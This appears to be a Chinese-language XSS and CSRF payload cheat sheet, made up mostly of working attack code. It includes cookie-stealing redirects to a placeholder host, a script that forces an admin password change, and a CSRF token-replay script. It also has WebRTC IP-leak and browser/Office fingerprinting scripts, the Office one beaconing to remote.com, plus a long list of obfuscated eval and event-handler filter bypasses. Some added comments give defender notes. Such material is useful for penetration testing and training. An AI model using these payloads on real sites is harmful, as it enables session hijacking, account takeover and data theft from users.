
XSS

body标签

<body onload='load();'>
</body>

JS语句内调用

<script>
    window.onload = ...;
</script>

常用方式

# 当前页面打开新页面
<body onload="window.location.href='http://xxx/?cookie=' + document.cookie"></body>

# 当前页面打开新页面
<body onload="document.location.href='http://xxx/?cookie=' + document.cookie"></body>

# 父页面打开新页面
<body onload="parent.location.href='http://xxx/?cookie=' + document.cookie"></body>

# 顶层页面打开新页面
<body onload="top.location.href='http://xxx/?cookie=' + document.cookie"></body>

# 当前页面打开新页面
<body onload="this.location.href='http://xxx/?cookie=' + document.cookie"></body>

# 当前页面打开新页面
<body onload="self.location.href='http://xxx/?cookie=' + document.cookie"></body>


<script>window.location.href='xxx' + document.cookie</script>

利用方法

拿cookie登录

令管理员自己修改密码

<script>window.location.href='http://127.0.0.1/api/change.php?p=dddddd';</script>
<script>$.ajax({url:'api/change.php',type:'post',data:{p:'123'}});</script>

XSS

payload

获取ip地址

//get the IP addresses associated with an account
// Recon payload: learns the browser's IP addresses by abusing WebRTC ICE
// candidate gathering (no permission prompt is shown to the user). Every
// distinct IPv4 address found in a candidate string is handed to `callback`
// exactly once.
// Defender notes: current browsers advertise private hosts as mDNS
// (.local) candidates instead of raw IPv4, and WebRTC can be disabled by
// policy, so this leak is far less reliable today than when it was written.
// The STUN request to stun.services.mozilla.com is observable outbound
// traffic from the victim's browser.
// @param {function(string): void} callback - invoked once per unique IPv4 address
function getIPs(callback){
// addresses already reported; used only to suppress duplicates
var ip_dups = {};
//compatibility for firefox and chrome (vendor-prefixed constructors)
var RTCPeerConnection = window.RTCPeerConnection
|| window.mozRTCPeerConnection
|| window.webkitRTCPeerConnection;
// legacy "optional constraints" form; NOTE(review): modern engines appear
// to ignore RtpDataChannels — confirm, it only matters for old Chrome builds
var mediaConstraints = {
optional: [{RtpDataChannels: true}]
};
//firefox already has a default stun server in about:config
// media.perconnection.default_iceservers =
// [{"url": "stun:stun.services.mozilla.com"}]
var servers = undefined;
//add same stun server for chrome (only when the webkit-prefixed ctor exists)
if(window.webkitRTCPeerConnection)
servers = {iceServers: [{urls: "stun:stun.services.mozilla.com"}]};
//construct a new RTCPeerConnection
var pc = new RTCPeerConnection(servers, mediaConstraints);
//listen for candidate events
pc.onicecandidate = function(ice){
//skip non-candidate events
if(ice.candidate){
//match just the IP address (first dotted quad in the candidate line)
var ip_regex = /([0-9]{1,3}(\.[0-9]{1,3}){3})/
// exec() returns null when the candidate holds no dotted quad (e.g. an
// IPv6 or mDNS candidate), so the [1] index throws a TypeError in that case
var ip_addr = ip_regex.exec(ice.candidate.candidate)[1];
//remove duplicates
if(ip_dups[ip_addr] === undefined)
callback(ip_addr);
ip_dups[ip_addr] = true;
}
};
//create a bogus data channel
pc.createDataChannel("");
//create an offer sdp (legacy callback-style createOffer/setLocalDescription)
pc.createOffer(function(result){
//trigger the stun server request; success/error callbacks are no-ops
pc.setLocalDescription(result, function(){}, function(){});
}, function(){});
}
//insert IP addresses into the page
// Consumer of getIPs: builds an <li> per reported address and classifies it
// as private (RFC 1918 / link-local) or public. As written the `if`/`else`
// bodies are comment-only placeholders, so this snippet is a template and
// does not parse as-is; the <li> is never appended to the document either.
getIPs(function(ip){
var li = document.createElement("li");
// textContent (not innerHTML) — the address is inserted as plain text
li.textContent = ip;
//local IPs: 192.168/16, 169.254/16, 10/8, 172.16/12
if (ip.match(/^(192\.168\.|169\.254\.|10\.|172\.(1[6-9]|2\d|3[01]))/))
// do something with PRIVATE IPs
//assume the rest are public IPs
else
// do something with PUBLIC IPs
});

获取浏览器信息

// Browser fingerprinting: writes navigator properties and the installed
// plugin / MIME-type list into the page with document.write.
// Defender notes: current browsers return a fixed or empty navigator.plugins
// list, so the plugin loop reveals little today. NOTE(review): if this runs
// after the page has finished loading, document.write replaces the existing
// document — confirm for the target context.
document.write('<P>'+navigator.appName+'</P>');
document.write('<P>'+navigator.appVersion+'</P>');
document.write('<P>'+navigator.platform+'</P>');
document.write('<P>'+navigator.userAgent+'</P>');

var plugins = navigator.plugins;
// no semicolon here; relies on ASI
var mimeTypes = navigator.mimeTypes

document.write('<P>');
// `i` and `j` are assigned without var/let and so become implicit globals
for (i=0;i<plugins.length;i++) {
var plugin = plugins[i];
// plugin name/filename/description are written unescaped as HTML markup
document.write('<B>'+plugin.name+'</B><BR>');
document.write(plugin.filename+' - '+plugin.description+'<BR>');
// each plugin is array-like over its supported MIME types
for(j=0;j<plugin.length;j++) {
var mimetype = plugin[j];
document.write(mimetype.type);
if(mimetype.description) {
document.write(' : '+mimetype.description);
}
if(mimetype.suffixes) {
document.write(' - extentions: '+mimetype.suffixes);
}
document.write('<BR>');
}

}
document.write('</P>');

CSRF

// Minimal asynchronous XHR helper used by the CSRF demo below.
// The request is sent with ambient cookies (relative URLs resolve to the
// page's own origin), which is why a token read from a same-origin response
// can be replayed: an anti-CSRF token does not protect against XSS.
// @param {string} url      - target, resolved against the current page
// @param {string} type     - HTTP method ('GET' / 'POST')
// @param {function} callback - assigned to onload; runs with `this` = the XHR
// @param {string} [send]   - form-encoded body; undefined for GET
function request(url, type, callback, send){
var oReq = new XMLHttpRequest();
oReq.open(type, url, true);
// body is sent as a classic form post, matching what a real form would send
oReq.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
oReq.onload = callback;
oReq.send(send);
// trailing ';' after a function declaration is an empty statement (harmless)
};

// onload handler for the GET of csrf.php: parses the returned page, reads
// the CSRF token out of its form and replays it in a POST that changes the
// profile. `this` is the XMLHttpRequest (request() assigns this to onload).
function getListener () {
var el = document.createElement('div');
// parse the response markup in a detached div (elements inserted via
// innerHTML do not run <script>, but the DOM is fully queryable)
el.innerHTML = this.responseText;
// querySelector returns null when no csrf_token input exists; `.value`
// would then throw a TypeError and the POST is never sent
request('csrf.php', 'POST', postListener, 'csrf_token=' + el.querySelector('input[name="csrf_token"]').value + '&update_profile=value');
};

// onload handler for the POST: just logs the server's reply to the console
// (`this` is the XMLHttpRequest).
function postListener(){
console.log(this.responseText)
};

// Entry point: fetch the form (no body, so send(undefined)), then getListener
// issues the token-bearing POST.
request('csrf.php', 'GET', getListener);

获取office信息

// Office version fingerprint (Internet Explorer only). `ActiveXObject` exists
// solely in IE; in any other browser each `new ActiveXObject(...)` throws and
// the empty catch leaves the sentinel value 1, so `key` stays
// "No Office Found". The result is then beaconed to a remote host.
var ma = 1;
var mb = 1;
var mc = 1;
var md = 1;

// Probe four SharePoint.OpenDocuments ProgIDs; which ones instantiate is
// mapped to an Office generation in the table below.
try {
ma = new ActiveXObject("SharePoint.OpenDocuments.4")
} catch (e) {}

try {
mb = new ActiveXObject("SharePoint.OpenDocuments.3")
} catch (e) {}

try {
mc = new ActiveXObject("SharePoint.OpenDocuments.2")
} catch (e) {}

try {
md = new ActiveXObject("SharePoint.OpenDocuments.1")
} catch (e) {}

// typeof is "object" when the ActiveX object was created and "number" when
// the sentinel 1 survived the failed construction
var a = typeof ma;
var b = typeof mb;
var c = typeof mc;
var d = typeof md;
var key = "No Office Found";

// Version table; it assumes newer Office releases also register the older
// ProgIDs, so the newest ProgID that instantiates decides the version.
if (a == "object" && b == "object" && c == "object" && d == "object") {
key = "Office 2010"
}
if (a == "number" && b == "object" && c == "object" && d == "object") {
key = "Office 2007"
}
if (a == "number" && b == "number" && c == "object" && d == "object") {
key = "Office 2003"
}
if (a == "number" && b == "number" && c == "number" && d == "object") {
key = "Office Xp"
}

// Exfiltration beacon: an image GET to remote.com carrying the result in the
// query string. Image loads are not subject to CORS, so only a CSP img-src
// restriction or egress filtering stops it; the office_version parameter in
// outbound proxy logs is a usable detection hook.
new Image().src = 'http://remote.com/log.php?office_version='+encodeURI(key);

绕过

replace

当 replace 的第二个参数是函数时，会把匹配到的字符串作为参数传给该函数（而不是用它做替换），因此下面传入 alert 时 alert 会被直接调用

"1".replace(/1/, alert)

杂项方法

<svg xmlns="http://www.w3.org/20" onload="alert`1`"/>
<script>prompt(1)</script>
<script>confirm(1)</script>
<script>
var fn=window[490837..toString(1<<5)];
fn(atob('YWxlcnQoMSk='));
</script>
<script>
var fn=window[String.fromCharCode(101,118,97,108)];
fn(atob('YWxlcnQoMSk='));
</script>
<script>
var fn=window[atob('ZXZhbA==')];
fn(atob('YWxlcnQoMSk='));
</script>
<script>window[490837..toString(1<<5)](atob('YWxlcnQoMSk='))</script>
<script>this[490837..toString(1<<5)](atob('YWxlcnQoMSk='))</script>
<script>this[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][+[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]](++[[]][+[]])</script>
<script>this[(+{}+[])[-~[]]+(![]+[])[-~-~[]]+([][+[]]+[])[-~-~-~[]]+(!![]+[])[-~[]]+(!![]+[])[+[]]]((-~[]+[]))</script>
<script>'str1ng'.replace(/1/,alert)</script>
<script>'bbbalert(1)cccc'.replace(/a\w{4}\(\d\)/,eval)</script>
<script>'a1l2e3r4t6'.replace(/(.).(.).(.).(.).(.)/, function(match,$1,$2,$3,$4,$5) { this[$1+$2+$3+$4+$5](1); })</script>
<script>eval('\\u'+'0061'+'lert(1)')</script>
<script>throw~delete~typeof~prompt(1)</script>
<script>delete[a=alert]/prompt a(1)</script>
<script>delete[a=this[atob('YWxlcnQ=')]]/prompt a(1)</script>
<script>(()=>{return this})().alert(1)</script>
<script>new function(){new.target.constructor('alert(1)')();}</script>
<script>Reflect.construct(function(){new.target.constructor('alert(1)')()},[])</script>
<link/rel=prefetch
import href=data:q;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg>
<link rel="import" href="data:x,<script>alert(1)</script>
<script>Array.from`1${alert}3${window}2`</script>
<script>!{x(){alert(1)}}.x()</script>
<script>Array.from`${eval}alert\`1\``</script>
<script>Array.from([1],alert)</script>
<script>Promise.reject("1").then(null,alert)</script>
<svg </onload ="1> (_=alert,_(1)) "">
javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>
<marquee loop=1 width=0 onfinish=alert(1)>
<p onbeforescriptexecute="alert(1)"><svg><script>\</p>
<img onerror=alert(1) src <u></u>
<videogt;<source onerror=javascript:prompt(911)gt;
<base target="<script>alert(1)</script>"><a href="javascript:name">CLICK</a>
<base href="javascript:/"><a href="**/alert(1)"><base href="javascript:/"><a href="**/alert(1)">
<style>@KeyFrames x{</style><div style=animation-name:x onanimationstart=alert(1)> <
<script>```${``[class extends[alert``]{}]}```</script>
<script>[class extends[alert````]{}]</script>
<script>throw new class extends Function{}('alert(1)')``</script>
<script>x=new class extends Function{}('alert(1)'); x=new x;</script>
<script>new class extends alert(1){}</script>
<script>new class extends class extends class extends class extends alert(1){}{}{}{}</script>
<script>new Image()[unescape('%6f%77%6e%65%72%44%6f%63%75%6d%65%6e%74')][atob('ZGVmYXVsdFZpZXc=')][8680439..toString(30)](1)</script>
<script src=data:,\u006fnerror=\u0061lert(1)></script>
"><svg><script/xlink:href="data:,alert(1)
<svg><script/xlink:href=data:,alert(1)></script>
<frameset/onpageshow=alert(1)>
<div onactivate=alert('Xss') id=xss style=overflow:scroll>
<div onfocus=alert('xx') id=xss style=display:table>

img方法

<img onerror="location='javascript:=lert(1)'" src="x">
<img onerror="location='javascript:%61lert(1)'" src="x">
<img onerror="location='javascript:\x2561lert(1)'" src="x">
<img onerror="location='javascript:\x255Cu0061lert(1)'" src="x" >

eval方法

/***********************/
/* Encoded eval string */
/***********************/
<script>
var eval_b64 = 'ZXZhbA==';
var eval_charcode = 'String.fromCharCode(101,118,97,108)';
var eval_base32 = '490837..toString(1<<5)';
var eval_non_alpha1 = '(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][+[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]';
var eval_non_alpha2 = '(+{}+[])[-~[]]+(![]+[])[-~-~[]]+([][+[]]+[])[-~-~-~[]]+(!![]+[])[-~[]]+(!![]+[])[+[]])';
</script>

/*********************/
/* Through functions */
/*********************/
<script>
var fn=window[atob('ZXZhbA==')];
fn(/*code to eval()/*);
</script>

<script>
var fn=window[String.fromCharCode(101,118,97,108)];
fn(/*code to eval()/*);
</script>

<script>
var fn=window[490837..toString(1<<5)];
fn(/*code to eval()/*);
</script>

/**********************************/
/* Straight through window object */
/**********************************/
<script>
window[atob('ZXZhbA==')](/*code to eval()*/)
</script>

<script>
window[String.fromCharCode(101,118,97,108)](/*code to eval()*/)
</script>

<script>
window[490837..toString(1<<5)](/*code to eval()*/)
</script>

<script>
window[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][+[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]](/* code to eval() */)
</script>

<script>
window[(+{}+[])[-~[]]+(![]+[])[-~-~[]]+([][+[]]+[])[-~-~-~[]]+(!![]+[])[-~[]]+(!![]+[])[+[]]](/* code to eval() */)
</script>

/*************************/
/* Straight through this */
/*************************/
<script>
this[atob('ZXZhbA==')](/*code to eval()*/)
</script>

<script>
this[String.fromCharCode(101,118,97,108)](/*code to eval()*/)
</script>

<script>
this[490837..toString(1<<5)](/*code to eval()*/)
</script>

<script>
this[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][+[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]](/* code to eval() */)
</script>

<script>
this[(+{}+[])[-~[]]+(![]+[])[-~-~[]]+([][+[]]+[])[-~-~-~[]]+(!![]+[])[-~[]]+(!![]+[])[+[]]](/* code to eval() */)
</script>

/****************/
/* regexp based */
/****************/
<script>
'e1v2a3l'.replace(/(.).(.).(.).(.)/, function(match,$1,$2,$3,$4) { this[$1+$2+$3+$4](/* code to eval() */); })
</script>

/*********************************/
/* Other ways to execute strings */
/*********************************/
<script>
delete /* code to execute */
throw~delete~typeof~/* code to execute */
delete[a=/* function */]/delete a(/* params */)
var a = (new function(/* code to execute */))();
</script>

MarkdownXSS

[kevil](javascript:alert`1`)
![kevil](http://p1.qhmsg.com/dm/180_180_100/t01fc6662a4934b6649.jpg"onload="alert(1))
![kevil]("onerror="alert(1))
![kevil" onload=alert(1);//](http://p1.qhmsg.com/dm/180_180_100/t01fc6662a4934b6649.jpg)
<svg/onload=alert(1)>